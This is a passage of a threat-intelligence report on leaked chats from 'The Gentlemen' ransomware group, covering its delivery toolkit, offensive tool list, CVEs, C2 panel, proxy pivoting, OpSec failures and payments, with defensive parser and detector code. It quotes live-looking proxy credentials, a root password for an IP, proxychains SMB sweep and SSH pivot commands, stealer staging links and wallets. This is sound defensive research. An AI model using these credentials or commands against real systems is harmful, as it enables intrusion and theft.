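REVENUE_RE = re.compile(r"(\d+(?:[.,]\d+)?)\s*(ккк|кк|к|лярд\w*|млрд|млн|тыс)")
IP_PORT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\b")
ZOOMINFO_RE = re.compile(r"https?://www\.zoominfo\.com/\S+")
SECTOR_RE = re.compile(r"Сектор\s*[-–—]\s*([^.\n]+)")
REVENUE_FIELD_RE = re.compile(r"Ревеню\s*[-–—]\s*(.+)$")


def parse_revenue(text: str) -> Optional[int]:
    """'5кк' -> 5_000_000, '12 лярдов' -> 12_000_000_000; None if no amount is found.
    Slang: к = thousand, кк = million (k·k), лярд = billion; млрд/млн/тыс are standard."""
    m = REVENUE_RE.search(text)
    if not m:
        return None
    num = float(m.group(1).replace(",", "."))
    unit = m.group(2)
    if unit == "ккк" or unit.startswith("лярд") or unit == "млрд":
        mult = 1_000_000_000
    elif unit in ("кк", "млн"):
        mult = 1_000_000
    else:  # "к" or "тыс"
        mult = 1_000
    return int(round(num * mult))


def parse_intake_line(line: str) -> Dict[str, object]:
    """Extract the fields an analyst needs from one intake line; absent fields are None."""
    ip_port = IP_PORT_RE.search(line)
    sector = SECTOR_RE.search(line)
    revenue = REVENUE_FIELD_RE.search(line)
    zoominfo = ZOOMINFO_RE.search(line)
    return {
        "ip": ip_port.group(1) if ip_port else None,
        "port": int(ip_port.group(2)) if ip_port else None,
        "zoominfo": zoominfo.group(0) if zoominfo else None,
        "sector": sector.group(1).strip() if sector else None,
        "revenue": parse_revenue(revenue.group(1)) if revenue else None,
        "raw": line,
    }


def parse_intake(text: str) -> List[Dict[str, object]]:
    """Parse every non-empty line of an intake dump."""
    return [parse_intake_line(ln) for ln in text.splitlines() if ln.strip()]


def match_members(records: List[Dict[str, object]],
                  member_nets: Dict[str, List[str]] = MEMBER_NETS) -> List[Tuple[str, str]]:
    """(member, ip) pairs where a listed target IP falls inside a member's netblock."""
    nets = {m: [ipaddress.ip_network(c) for c in cidrs] for m, cidrs in member_nets.items()}
    hits = []
    for rec in records:
        if not rec["ip"]:
            continue
        try:
            ip = ipaddress.ip_address(rec["ip"])
        except ValueError:
            continue  # malformed address in the intake text; skip rather than crash
        for member, blocks in nets.items():
            if any(ip in b for b in blocks):
                hits.append((member, str(ip)))
    return hits


if __name__ == "__main__":
    recs = parse_intake(SAMPLE_INTAKE)
    for r in recs:
        print(r["ip"], r["port"], r["sector"], r["revenue"])
    print("members to notify:", match_members(recs))
```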
3.2 FOBOS Loader — Initial Access Toolkit
A Windows Explorer screenshot reveals the TOOLS/FOBOS/ folder hierarchy, which is the group's initial access and payload delivery platform.
Top-level contents:
- FOBOSLOADER — the primary loader
- CAMPAIGNS+ — campaign management
- MAIL BASES, MAILS, MAIL, APACH, DOMAIN — email infrastructure
- Phemedrone Stealer V2.3.2 — info stealer
- AntiPublic — credential checking tool
- XENO — additional tooling
Delivery methods (NEWWAYS/ subfolder):
- HTMLSMUG — HTML smuggling
- CLEARFIX — ClickFix social engineering variant
- pdfdropper-main, PDF+DOC — document-based delivery
- msi-dropper — MSI package delivery
- NEW LNK, EXTRA NEW LNK — LNK-based delivery
- polyglotter — polyglot file creation
- SMTPSMUG — SMTP smuggling
- URIURL — URI/URL handler abuse
- waterhydra URL IN ZIP — CVE-2024-21412 exploitation
- SELFDELETE — self-deleting payloads
- PYDROPPER — Python-based dropper
- BobTheSmuggler-main.zip — HTML smuggling tool
- file-archiver-in-the-browser-main — browser-based file archive lure
- BITMBMITB — browser-in-the-browser attack framework

FOBOS NEWWAYS folder — full delivery method arsenal (timestamps May 2023 – April 2025)

Additional tooling observed in NEWWAYS/ (from screenshot):
- electron selenium chrome — likely a Selenium-driven Chromium/Electron automation bundle (consistent with traffic/interaction automation, testing, or mass-account workflows)
- grim — ambiguous naming; may be a local build/alias for a dropper or lure generator (needs confirmation from files)
- 12.SettingContent-ms — Windows SettingContent-ms handler/lure content (commonly used to trigger settings/URI handler flows)
- !!!!!!!!!!!!smugglo-main.zip — zip-named smuggling-related tool (likely a renamed “Smuggler/Smuggle” project archive; needs confirmation from files)
3.3 Tooling Arsenal
All GitHub repositories referenced in the leaked chats (extracted by Olivier Ferrand via grep github *csv -r | cut -f4 -d, | sort | uniq):

GitHub tool references extracted from the corpus by Olivier Ferrand
Interpreting GitHub link sharing (role signal)
Based on collaborator review of the GitHub links, zeta88 and qbit account for the large majority of unique tool references. The split in what they share aligns with an “operator chain builder” vs “access/infrastructure” division of labor:
- zeta88: operator-focused tooling (credential dumping, EDR disruption, LPE, C2 frameworks, lateral movement, and cloud/Azure exploitation).
- qbit: access and infrastructure enablement (VPN setup, tunneling/proxying, AD recon, NTLM relay/coercion tooling, forensic cleanup, and exploit PoCs).
Other participants appear to contribute comparatively few repositories (e.g., Wick, JeLLy), consistent with a narrower execution-focused role in the portions of the leak that were exported. Separately, collaborator notes indicate mAst3r and Wick shared “backup/tutorial” style material (e.g., myphp content), which may reflect tasking around post-access operations rather than tool-sourcing.
Credential Extraction:
- Maldev-Academy/DumpBrowserSecrets — browser credential dumping
- andreisss/KslDump — credential dumping
- S1lkys/KslKatz — Kerberos ticket extraction
- tanrikuluatahan/mimikatz — patched Mimikatz for Windows 11 24H2/25H2
- toneillcodes/dpapi-projects — DPAPI credential extraction
- xaitax/Chrome-App-Bound-Encryption-Decryption — Chrome cookie decryption
EDR Evasion:
- TwoSevenOneT/EDRStartupHinder — EDR startup process blocker
- Nightmare-Eclipse/RedSun — evasion framework
CrowdStrike: The corpus also includes a note that a CrowdStrike-focused “killer” exists, but is priced as premium tooling:
▎ mAst3r (2026-01-21 16:27): “на крауд тоже есть, просто стоит где то 5000$” = “there's one for Crowd too, it just costs about $5,000”
▎ Wick (2026-01-21 16:19): “остался только крауд из топов” = “only CrowdStrike left from the top EDRs”
Lateral Movement and AD Exploitation:
- trustedsec/Titanis — AD exploitation
- mdsecactivebreach/RegPwn — registry-based privilege escalation
- blacklanternsecurity/MANSPIDER — file search across SMB shares
- depthsecurity/RelayKing-Depth — NTLM relay
- 0x0Trace/Certihound — AD CS exploitation (ESC1–ESC17)
- Pennyw0rth/NetExec (pull 1054) — CertiHound integration
- dazzyddos/PrivHound — privilege path discovery
- S1lkys/AudioDG.exe-DLL-Hijacking-for-LPE — local privilege escalation
- hausec/PowerZure — Azure exploitation
- wh0amitz/TailVNC — VNC-based access
C2 and Tunneling:
- jxroot/ZeroPulse — C2 framework
- 1r0BIT/TaskHound — task management for implants
- nullsection/chisel-ng — SOCKS tunneling
- shunf4/proxychains-windows — Windows proxy chaining
- pizdatiigus/Double-VPN-with-OpenVPN — double VPN setup
- Velocidex/velociraptor v0.76 — repurposed DFIR tool as C2
- evilsocket/nyx — post-exploitation
Vulnerability Exploitation:
- platsecurity/CVE-2025-32433 — Erlang SSH RCE
- bombadil-systems/zombie-zip — archive-based exploitation
Infrastructure:
- angristan/wireguard-install — WireGuard VPN setup
- angristan/openvpn-install — OpenVPN setup
3.4 CVEs Referenced
| CVE | Context |
|---|---|
| CVE-2024-55591 | Fortinet authentication bypass. Referenced by Kunder in operational chat and in screenshots. Primary initial access vector. |
| CVE-2024-21412 | Windows SmartScreen bypass (WaterHydra). Folder name in FOBOS toolkit. |
| CVE-2025-32433 | Erlang/OTP SSH RCE. Shared by qbit with exploit PoC. |
| CVE-2025-33073 | Referenced in relay/coercion discussion by qbit. |
3.5 G-BOT Control Panel — Custom C2
The G-BOT Control Panel is a previously undocumented custom C2 framework observed in multiple screenshots. Key features:
- Web-based UI with beacon management (online/offline status, OS detection, privilege level)
- Per-beacon actions: Execute, SOCKS proxy, Kill, Delete
- Built-in SOCKS5 proxy configuration with usage examples for proxychains, cURL, and SSH
- Builder UI with options to upload payloads to temp.sh/0x0.st and save Tox/Session IDs for future builds

- PID file: /var/run/gbot_root.pid
- Supports both Linux and Windows beacons

G-BOT C2 framework — operator desktop screenshot
Usage of G-BOT (as observed in screenshots)
G-BOT appears to be used as an interactive post-exploitation C2/pivot platform:
- Beacon management: operators can search beacons by hostname/domain/IP/username and track status (Online/Offline).
- Live command execution: examples shown include running `cat /var/run/gbot_root.pid` on a Linux beacon and `whoami` on a Windows beacon.
- Privilege/context display: the UI shows the effective privilege level (e.g., ROOT on Linux, ADMINISTRATOR on Windows), which likely informs tasking (dump creds, deploy tools, stage encryption, etc.).
- SOCKS pivoting: each beacon advertises a SOCKS port (e.g., 30001, 30002), consistent with using compromised hosts as traffic relays for internal discovery/lateral movement.
- Operator actions: per-beacon buttons (Execute, SOCKS, Kill, Delete) suggest the ability to run commands, enable/attach to a proxy tunnel, terminate implants, and remove entries/artifacts.
Observed beacons in screenshots:
- Linux: debian / unknown@debian / ROOT / SOCKS: 30001
- Windows: WIN-RU3I93PPUD7 / Administrator@WORKGROUP / ADMINISTRATOR / SOCKS: 30002
G-BOT beacon management UI — per-beacon Execute, SOCKS, Kill, and Delete actions
3.5.1 SOCKS5 Proxy Infrastructure — Operator Pivoting Layer
SOCKS5 proxying is a core component of The Gentlemen's operational infrastructure, used at multiple layers: as a built-in feature of the G-BOT C2 (per-beacon SOCKS ports), as standalone proxy credentials shared between operators, and via SSH dynamic port forwarding. The group chains these proxies through proxychains to route lateral-movement tools (primarily nxc) through compromised hosts or external proxy services.
G-BOT integrated SOCKS: Each G-BOT beacon automatically advertises a SOCKS port (e.g., 30001, 30002), enabling operators to pivot through compromised hosts for internal network discovery and lateral movement without exposing their origin IP.
External SOCKS5 proxy credentials (verbatim from room 302930):
2026-03-18 — qbit:
socks5://a53a47b57b8ba462:[email protected]:36067
2026-03-18 — zeta88 (proxychains.conf format):
socks5 91.245.35.22 36067 a53a47b57b8ba462 c791621140ee88f93acd4fb3538b3z55
Operational usage pattern: Operators configure proxychains to route nxc SMB scans through SOCKS proxies, enabling internal network enumeration from outside the victim VPN tunnel:
`proxychains -q nxc smb IP.IP.IP.IP/24`
`proxychains nxc smb 10.0.1.0/24` → domain controllers discovered
SSH dynamic forwarding is also used as a lightweight SOCKS alternative:
`ssh -NfD 1080 user@ip` → opens SOCKS proxy on 127.0.0.1:1080, added to proxychains
`ssh -J user@pivot1 user@pivot2` → multi-hop pivoting
Tooling: chisel-ng (SOCKS tunneling), proxychains-windows (Windows proxy chaining), and Double-VPN-with-OpenVPN are all referenced in the corpus as infrastructure enablement tools, primarily shared by qbit.
Tor-based proxy service: The .onion address nsocks4pvtcewb2ora3zk47ksx7dvazbxyhzp4myhegpthgkphpi7aad.onion (“nsocks” naming) appears in the corpus and likely represents a SOCKS proxy provisioning or resale service used by operators.

SOCKS5 proxy configuration — proxychains and tunnel setup for operator pivoting
Detection relevance: SOCKS proxy traffic from internal hosts to external IPs on non-standard ports (e.g., 36067) — particularly when correlated with SMB enumeration or AD reconnaissance — is a strong indicator of proxy-chained lateral movement consistent with this group's TTPs.
This is an internal guide written for Gentlemen operators explaining how to use SOCKS5 tunnelling after gaining access to a victim network. It functions as an internal training document.

The guide explains that once a SOCKS5 tunnel is set up on a server inside the victim's network, the operator gets full access as if they were physically inside. It then lists what's accessible through the tunnel: Jira and Confluence via internal IP, web interfaces of internal services (routers, NAS, management panels), and internal computers via RDP/SMB scanning. It notes limitations — SOCKS5 over SSH doesn't support UDP, only TCP, and warns about DNS leaks when using a browser proxy, recommending disabling “Proxy DNS when using SOCKS v5” in Firefox. It also notes that Windows machines require access through pass-the-hash or scanners rather than direct tunnel access, and RDP/SMB needs separate credentials.

The practical setup section at the bottom shows the configuration: SOCKS host 127.0.0.1, port 1080, with proxy DNS disabled.
For the report: this is evidence the group maintains internal operational documentation and trains members on post-exploitation lateral movement techniques, reinforcing the picture of a structured organisation with onboarding procedures rather than ad hoc actors.
So what?
SOCKS5 proxying is the operational backbone of The Gentlemen's post-access workflow — not an optional technique but the default routing layer through which all lateral movement, internal reconnaissance, and pre-encryption staging flows. The implication for defenders is straightforward: outbound SOCKS traffic from an internal host to a non-standard port, correlated with SMB enumeration, is not an early warning indicator — it means the intrusion is already in its exploitation phase. The recovered internal training guide confirms this is a standardized, taught methodology within the group, meaning the pattern will persist across future operations and likely across adjacent groups inheriting the same playbooks.
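The indicator called out in the detection note and the "So what?" above, as an added detection example (not tooling from the leak or code from the report's authors): a small Python correlator over flow records that flags an internal host making non-standard-port egress to an external IP while sweeping internal hosts over SMB within the same window. The flow record format, the external IPs, the window and the fan-out threshold are all assumptions; the sample records are constructed.

```python
# Added example, not code from the leak or from the report's authors: a minimal
# detector for the proxy-chained lateral-movement pattern described above. It reads
# flow records (constructed sample data here) and flags an internal host that opens an
# outbound connection to an external IP on a non-standard port and, within a short
# window, fans out SMB (TCP 445) connections to many internal hosts.
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# RFC 1918 ranges count as "internal"; anything else is treated as external.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Egress ports considered normal (assumed baseline); outbound traffic to an external IP
# on any other port (e.g. 36067, the proxy port seen in the corpus) is the first signal.
STANDARD_EGRESS_PORTS = {25, 53, 80, 123, 443, 587, 993}
SMB_PORT = 445
WINDOW = timedelta(minutes=10)      # assumed correlation window
SMB_FANOUT_THRESHOLD = 10           # assumed: distinct internal SMB targets within WINDOW


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def parse_flow(line):
    """Parse a constructed 'timestamp src dst dport' flow record."""
    ts, src, dst, dport = line.split()
    return datetime.fromisoformat(ts), ip_address(src), ip_address(dst), int(dport)


def detect_proxy_chained_lateral_movement(lines):
    """Return {src: [(ext_dst, dport, ts_iso, smb_target_count), ...]} for internal
    hosts showing both signals; hosts with only one signal produce no entry."""
    egress = defaultdict(list)  # src -> [(dst, dport, ts)] non-standard external egress
    smb = defaultdict(list)     # src -> [(dst, ts)] internal SMB connections
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, dport = parse_flow(line)
        if not is_internal(src):
            continue
        if not is_internal(dst) and dport not in STANDARD_EGRESS_PORTS:
            egress[src].append((dst, dport, ts))
        elif is_internal(dst) and dport == SMB_PORT:
            smb[src].append((dst, ts))

    hits = {}
    for src, conns in egress.items():
        for dst, dport, ts in conns:
            # Correlate: distinct internal SMB targets within WINDOW of the egress flow.
            targets = {d for d, t in smb[src] if abs(t - ts) <= WINDOW}
            if len(targets) >= SMB_FANOUT_THRESHOLD:
                hits.setdefault(str(src), []).append(
                    (str(dst), dport, ts.isoformat(), len(targets)))
    return hits


def sample_flows():
    """Constructed flow records: one host that matches the pattern, two that do not.
    External IPs are documentation-range addresses, not indicators from the leak."""
    base = datetime(2026, 3, 18, 10, 0, 0)
    lines = []
    # 10.0.5.21: non-standard egress to an external IP, then a /24 SMB sweep.
    lines.append(f"{base.isoformat()} 10.0.5.21 203.0.113.7 36067")
    for i in range(1, 25):
        t = base + timedelta(seconds=10 * i)
        lines.append(f"{t.isoformat()} 10.0.5.21 10.0.1.{i} 445")
    # 10.0.5.22: ordinary HTTPS egress plus a few file-share connections (benign).
    lines.append(f"{base.isoformat()} 10.0.5.22 203.0.113.9 443")
    for i in range(1, 4):
        t = base + timedelta(seconds=30 * i)
        lines.append(f"{t.isoformat()} 10.0.5.22 10.0.1.{i} 445")
    # 10.0.5.23: non-standard egress alone, no SMB fan-out (single signal, not flagged).
    lines.append(f"{base.isoformat()} 10.0.5.23 198.51.100.4 36067")
    lines.append(f"{(base + timedelta(minutes=1)).isoformat()} 10.0.5.23 10.0.1.1 445")
    return lines


if __name__ == "__main__":
    for host, evidence in detect_proxy_chained_lateral_movement(sample_flows()).items():
        for ext_dst, port, when, n in evidence:
            print(f"{host}: egress to {ext_dst}:{port} at {when}, {n} SMB targets nearby")
```

Feeding real NetFlow or firewall logs only requires replacing `parse_flow`; the baseline port set and threshold should be tuned to the environment before use.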
3.5.2 Velociraptor — Repurposed DFIR Tool as C2
The legitimate Velociraptor DFIR platform (v0.76) was repurposed by the group as a C2 framework with multi-org configurations and MSI client packaging. The following screenshots from the leaked corpus show the Velociraptor admin panel actively in use by operators:


Velociraptor admin panel — multi-org C2 configuration and MSI client builder for victim deployment
3.5.3 Backup Management
In a ransomware operation, access to a storage array management CLI like this is very concerning. An attacker with this level of access could:

- Destroy backups and recovery options — commands like delete volume, delete snap-pool, delete snapshots, clear cache would let them wipe out backup volumes and snapshots before deploying the ransomware payload. This is a standard ransomware playbook move: eliminate recovery options so the victim has no choice but to pay.
3.6 Malware Scan Evasion
A multi-engine scan screenshot shows the file SetupGps2.exe (5,650,552 bytes) detected by only 1 of 9 engines:

| Engine | Result |
|---|---|
| CrowdStrike Falcon | Threat Detected |
| F-Secure | Undetected |
| Kaspersky | Undetected |
| Max Secure | Undetected |
| McAfee | Undetected |
| Microsoft Defender | Undetected |
| Sophos | Undetected |
| Threatdown | Undetected |
| TrendMicro | Undetected |
Hashes:
- MD5: bdfae4ff271414df8db7bfd255cf603e
- SHA-1: fe06486c3f74b317d7ec5cc9be8915c34a07a68f
- SHA-256: 91017846dd71fbbfcd40f116aca8d4c66f51583cb26fa9a54de0e1f08c9cd40f
3.7 Most Important OpSec Observations (as observed in the leak)
3.7.1 Password Reuse Across Victims
Group-branded VPN passwords recur across unrelated targets (gentlemen25, Gentlemen25, gentle26). One disclosure potentially risks multiple intrusions.
Verbatim quotes (selected):
2026-03-09 17:18:15 — zeta88:
183.178.108.244:443 root gentle26
gentle26
gentlemen25
Gentlemen25
Note: Credential drop showing reuse of group-branded passwords across targets.
2026-02-02 13:17:59 — zeta88:
“root gentle26 от нее будет”
Translation: “root gentle26 — that'll be from her.”
Note: Confirms branded VPN password assignment to a new target.
3.7.2 Additional OpSec Failures
Several lower-tier findings share a common theme of weak operational separation. Operators procure high-end infrastructure hardware (X99 dual-Xeon systems, ASUS WRX80E-SAGE boards, Threadripper Pro 3975WX processors) from Russian consumer marketplaces in the same browsing sessions used for intrusion operations, increasing real-world traceability. Personal browsing (Wildberries.ru, YouTube, SoundCloud) and competitor OSINT monitoring (e.g., tweets about Black Basta leadership) also appear on operational machines. The group's Rocket.Chat comms platform, hosted on the same Tor infrastructure, leaked channel references, DM room IDs, and full message history — producing the consolidated operational record analysed in this report.

Operator hardware procurement — workstation-class components sourced from Russian consumer marketplaces
3.7.3 LimeWire as Staging and Payload Hosting
Staging URLs on LimeWire were used to host tooling (including credential-harvesting components and “FULL G-EDR”).
Verbatim quotes (selected):
2026-01-11 18:58:39 — zeta88:
“https://limewire.com/d/XgGcm#Ln9Ijzsyim xen от @JeLLy сразу с external dll (если супер новая лиса то ставим другие external выше)”
Translation: “XenAllPasswords from @JeLLy with external dll — if very new Firefox install different externals.”
Note: Staging link for credential-harvesting tool with Firefox version-specific DLL instructions.
2026-02-20 04:25:02 — zeta88:
“https://limewire.com/d/BLcyA#fuUtpUJWK9 FULL G-EDR”
3.7.4 Rankings
A screenshot captured within the leaked data itself shows a public ransomware statistics page listing The Gentlemen as the second most active group in 2026 (behind Qilin, ahead of Clop), with approximately 130 victims attributed to the group and 1,410 total victims tracked across 322 groups at the time of that snapshot. This is a point-in-time capture from an operator's desktop — not the current total, which now exceeds 400 per RansomLook. The screenshot is notable because it demonstrates that the group actively monitors its own ranking relative to competitors, indicating deliberate competitive benchmarking within the RaaS ecosystem.

Ransomware group ranking page — The Gentlemen listed as #2 in 2026 with ~130 victims, observed on operator desktop
3.7.5 Leak-Site Pressure as Secondary Extortion

Screenshot of ransomware leak site with proof of life from a victim in the healthcare sector
The group appears to leverage this as a secondary pressure tactic during stalled negotiations:

Leak notification as negotiation leverage — operator monitoring during stalled negotiations
3.7.6 Forum Activity from Ops Desktop
Darknet forum browsing (e.g., RAMP/DragonForce and exploit forums) appears alongside operational activity; a forum handle “Mr.Bang” is visible in artifacts.
Verbatim quotes (selected):
2026-04-21 19:02:15 — zeta88:
“Gunra - че эт ваще такое... Hyflock туда же. этот мудень мне писал)) ShadowByt3$ RAAS - хз / Anubis - % видел он? / CHAOS - возьмут ли они его еще. / The Gentlemen's / Dragon Force / вот и весь выбор”
Translation: “Gunra — what even is that... Hyflock same thing. That idiot messaged me. ShadowByt3$ RAAS — idk / Anubis — seen him? / CHAOS — will they even take him. / The Gentlemen's / Dragon Force / that's the whole choice.”
Note: zeta88 evaluates rival RaaS programs, revealing competitive landscape awareness and affiliate-shopping behaviour.
2026-04-21 19:02 — zeta88:
“Потому что я знаю что драгонам платят, и они платят адвертам, и за них только за софт и панель плохое говорили. Не про них самих. А про нас ты всё сам знаешь)”
Translation: “Because I know DragonForce pays, and they pay affiliates — only the software and panel got bad reviews, not the people themselves. And you know everything about us yourself.”
Note: Positive assessment of DragonForce's affiliate compensation; implicit comparison to The Gentlemen's own standing.
The following is a botnet/malware advertisement on the RAMP forum (Russian Anonymous Marketplace), a well-known Russian-language cybercrime forum associated with ransomware groups. The site is on a .onion (Tor) domain, and the forum branding shows DragonForce at the top left.

The post is by a user called Mr.Bang (member since Sep 2023). Here's a translation of the Russian text:
- “Закреп система на основе белого софта” — Persistence system based on legitimate (“white”) software
- “Защита от детектов основного ядра” — Protection from detection of the core payload
- “Даже при попадании на Virustotal 0/61” — Even if uploaded to VirusTotal, 0/61 detections
- “Ботнэт система” — Botnet system
- “СЛОЖНО вычислить Админку” — Hard to trace the admin panel
- “Админка -> белый сайт-сервер Relay <- бот” — Admin panel → legitimate site/server relay → bot (describing the C2 architecture using a clean relay to hide the backend)
- “Возможности админки-команды: Запустить / Скачать и запустить” — Admin panel commands: Run / Download and run
- “Возможные дополнения: Файловый менеджер, Стиллер” — Optional modules: File manager, Stealer
- “да и почти что угодно” — and pretty much anything else
3.7.7 Hyper-V Volume Manager Targeting
Operator screenshots show active interaction with Hyper-V Volume Manager interfaces on victim infrastructure. The group targets Hyper-V virtual disk volumes directly, enabling encryption at the hypervisor level rather than within individual guest VMs. This is particularly problematic for defenders: encrypting at the Hyper-V volume layer bypasses guest-level EDR and backup agents entirely, rendering per-VM security controls ineffective. A single encryption pass at the host level can simultaneously destroy all guest VMs hosted on the hypervisor, dramatically amplifying the blast radius of a single compromised Hyper-V host.

Hyper-V Volume Manager interface — operator targeting virtual disk volumes at the hypervisor level.
3.7.8 Operator Infrastructure Tooling — Zabbix, Vaultwarden, RAZBOR, FIRSTMAIL

Image above shows Zabbix and Vaultwarden usage, plus bookmarks for RAZBOR (“analysis” in Russian) and FIRSTMAIL (likely a mail/credential workflow).
- Zabbix dashboard tab: Indicates the operators monitor infrastructure health (hosts, services, uptime, alerts) in the same browsing session used for operations — reinforcing weak separation between ops and admin tooling.
- Vaultwarden tab: Suggests the group uses a self-hosted Bitwarden-compatible password manager to store and retrieve credentials (victim creds, internal service creds, infrastructure logins), enabling rapid reuse and sharing across operators.
- Bookmarks — RAZBOR / FIRSTMAIL: These shortcuts imply repeatable internal workflows: “RAZBOR” as a dedicated analysis portal/workspace, and “FIRSTMAIL” as an email access, mailbox triage, or credential delivery system used during targeting and/or post-compromise operations.
3.7.9 LDAP Configuration Extraction from FortiGate Dumps
FortiGate configuration exports shared between affiliates contain plaintext LDAP bind credentials — including the bind DN, bind password, LDAP server IP/hostname, and base DN for directory searches. These configurations are extracted directly from FortiGate config user ldap stanzas and provide attackers with authenticated read access to Active Directory without needing to compromise a domain-joined host first. In the corpus, LDAP bind credentials are used for AD enumeration (user/group listing, OU structure mapping) and as a pivot point for password spraying against domain controllers. CyberArk-integrated targets are also observed — the screenshot below shows a FortiGate LDAP configuration pointing to a CyberArk-managed directory environment, indicating that even organizations with privileged access management (PAM) solutions in place had their LDAP bind credentials exposed through the FortiGate configuration layer, bypassing the PAM controls entirely:

3.7.10 Voice-Based Extortion — English-Speaking Caller Recruitment
This is an Exploit.in forum profile for a user called “perfect” (profile ID 216843), and the browser tab next to it shows “quant - IT-Consult” — suggesting whoever took this screenshot was investigating quant's forum presence alongside this profile.
“Ищу сипку/Looking for a SIP” (23 November 2025) — perfect is looking for a US SIP trunk with P1 priority, budget $2,000–$3,000, escrow required. SIP stands for Session Initiation Protocol. It's a signaling protocol used in telecommunications to initiate, maintain, and terminate real-time communication sessions — most commonly voice calls over the internet (VoIP), but also video calls and messaging.
SIP trunks are used for making VoIP calls that appear to originate from US phone numbers. In a ransomware context, this is infrastructure for cold-calling victims — a tactic where operators phone the target company directly to pressure them into paying, often impersonating IT support or referencing the encryption to create panic.

“Ищу пару человек под прозвон корп USA” (17 December 2025) — posted twice, in Russian and English. The title translates to “Looking for a couple of people for cold-calling US corporations.” The English version states: “I'm looking for several ringers for corpses, the revenues are quite large.” The word “corpses” is almost certainly a mistranslation or slang for “corps” (corporations). They're recruiting English-speaking callers to phone US corporate victims, requiring “sufficient level of English.”
This links the Gentlemen's operation to voice-based extortion pressure — not just DLS posting and encryption, but actively calling victims to accelerate payment. The SIP purchase predates the caller recruitment by three weeks, showing methodical infrastructure build-out.
Analyst assessment — “perfect” / SIP link to The Gentlemen: The co-occurrence of the “perfect” Exploit.in profile (SIP trunk procurement, English-speaking caller recruitment) and the “quant — IT-Consult” browser tab in the same operator screenshot is assessed as a moderate-confidence indicator that “perfect” is either a Gentlemen affiliate or a shared-services provider used by the group. The evidentiary chain is as follows: (1) the screenshot was captured on a Gentlemen operator's desktop during active operations; (2) the operator was simultaneously viewing quant's forum presence alongside perfect's profile, suggesting an operational relationship rather than casual browsing; (3) perfect's SIP procurement timeline (November 2025) and caller recruitment (December 2025) align precisely with the Gentlemen's scaling phase visible in the corpus; (4) the cold-calling capability matches the group's multi-layered extortion model (encryption + DLS + direct victim contact). However, this remains circumstantial — the screenshot alone does not confirm that perfect is a Gentlemen member versus an independent service provider whose offerings were being evaluated. Further corroboration (e.g., shared Tox IDs, payment flows, or forum DMs) would be needed to elevate this to high confidence. This assessment was developed alongside intelligence gathered by the broader Ransom-ISAC community.
3.7.11 Operator Payments and AML Disclosures
A February 2026 conversation captured between zeta88 and Kunder provides direct evidence of operator payments and significant operational intelligence on cash-out methodologies.
| Category | Details |
|---|---|
| Payment & Indicators | zeta88 transferred funds from his own Bitcoin wallet (17U3tN7hzwYwwya8qkyZgnG9jy3unHG7xL) to Kunder's personal Bitcoin wallet (1CgfAohwbTSYsyxPvphdcrcfSd1XE5C8Rr), confirming the transaction link. Kunder confirmed receipt, with zeta88 framing the payment as being “for the development of our common cause.” |
| Cash-out operations | zeta88 claims he has “run about 800 [BTC] through cash-outs in my life, all through exchange chains” — a figure that would represent ~$80M USD at current prices. Analyst caveat: This is an unverified operator claim made in internal chat and may represent significant exaggeration or bragging; ransomware operators routinely inflate their track records in peer conversations to establish credibility. The figure is included as an operator statement, not a confirmed fact. zeta88 also indicates reliance on Tinkoff Bank QR codes for converting cryptocurrency to Russian fiat (specifically mentioning thresholds “from 400k” rubles). |
| Physical settlement | Kunder references locking in an exchange rate and arranging for an associate to bring physical cash (“at end of month. Will bring cash”), highlighting in-person cash settlements as a supplementary payout vector. |
| Infrastructure context | During this exact payment exchange, zeta88 notes their data leak blog was actively being DDoSed (“the redirector went down this time”), indicating operational friction even during routine affiliate payouts. |
Verbatim quotes from payment exchange:
| Timestamp | User | Message / Action |
|---|---|---|
| 2026-02-10 21:21 | zeta88 | “поставил кош?” (“did you set up a wallet?”) |
| 2026-02-10 21:32 | Kunder | 1CgfAohwbTSYsyxPvphdcrcfSd1XE5C8Rr |
| 2026-02-10 23:08 | zeta88 | bitcoinblockexplorers.com/tx/7e366683f1d175278feefaaa35d87e87076931974506b9f373a775a428c28f10... |
| 2026-02-11 15:10 | Kunder | “Получил. Спасибо 🤝” (“Received. Thank you”) |
| 2026-02-11 16:44 | zeta88 | “не за что. на развитие общего дела” (“Don't mention it. For the development of our common cause”) |
| 2026-02-12 00:45 | zeta88 | “Пока не поздно, биток щас ебнется еще имхо” (“Before it's too late, Bitcoin will drop again in my opinion”) |
| 2026-02-12 10:44 | Kunder | “я 'зафиксировал курс', чувак в конце месяца приедет. бабки привезет.” (“I 'locked in the rate', a guy is coming at end of month. Will bring cash.”) |
| 2026-02-10 20:19 | zeta88 | “я уже за свою жизнь прогнал через скупов около 800... всё через связки обмена” (“I've run about 800 [BTC?] through cash-outs in my life, all through exchange chains”) |
| 2026-02-10 20:25 | zeta88 | “толи им пофиг, толи амл чистый на эти монеты” (“either they don't care, or the AML score is clean on these coins”) |
| 2026-02-10 21:17 | Kunder | “по сути выплаченые бтц не должны иметь амл. а вот проследить их могут” (“in theory paid-out BTC shouldn't trigger AML, but they can trace it”) |
| 2026-02-10 23:06 | zeta88 | “там qr тинькофф он делает от 400к” (referring to a cash-out via Tinkoff Bank QR codes from 400k rubles) |
| 2026-02-10 23:06 | zeta88 | “ддосят блог... в этот раз вышел из строя уже редиректор” (“our blog is getting DDoSed... the redirector went down this time”) |
This exchange provides actionable Bitcoin wallet indicators, fiat cash-out vectors (Tinkoff QR codes), and insight into the group's internal financial logistics. It also highlights operational friction (DDoS attacks on their leak blog) and team dynamics, with zeta88 framing the payment as an investment in “our common cause.”
Of particular note is the payment value: zeta88 sent Kunder approximately $1,400 USD. This amount provides an interesting benchmark for either an advance, a retainer, or a flat-fee payment to a newly recruited affiliate handling initial access/phishing, demonstrating the day-to-day operational compensation structure apart from the massive multi-million-dollar final ransom splits.
It is notable that this is a relatively modest, operational “working payment” compared to the headline ransom figures the group pursues, and it provides a rare glimpse into the practical, day-to-day cashflow between core operators and affiliates.

BTC transfer from zeta88 to Kunder
The originating address, belonging to the leader zeta88, is 17U3tN7hzwYwwya8qkyZgnG9jy3unHG7xL:

zeta88's BTC address
Zeta88's wallet received funds from generally “green” (low-risk) sources, suggesting effective money-laundering techniques for obscuring the source of funds.
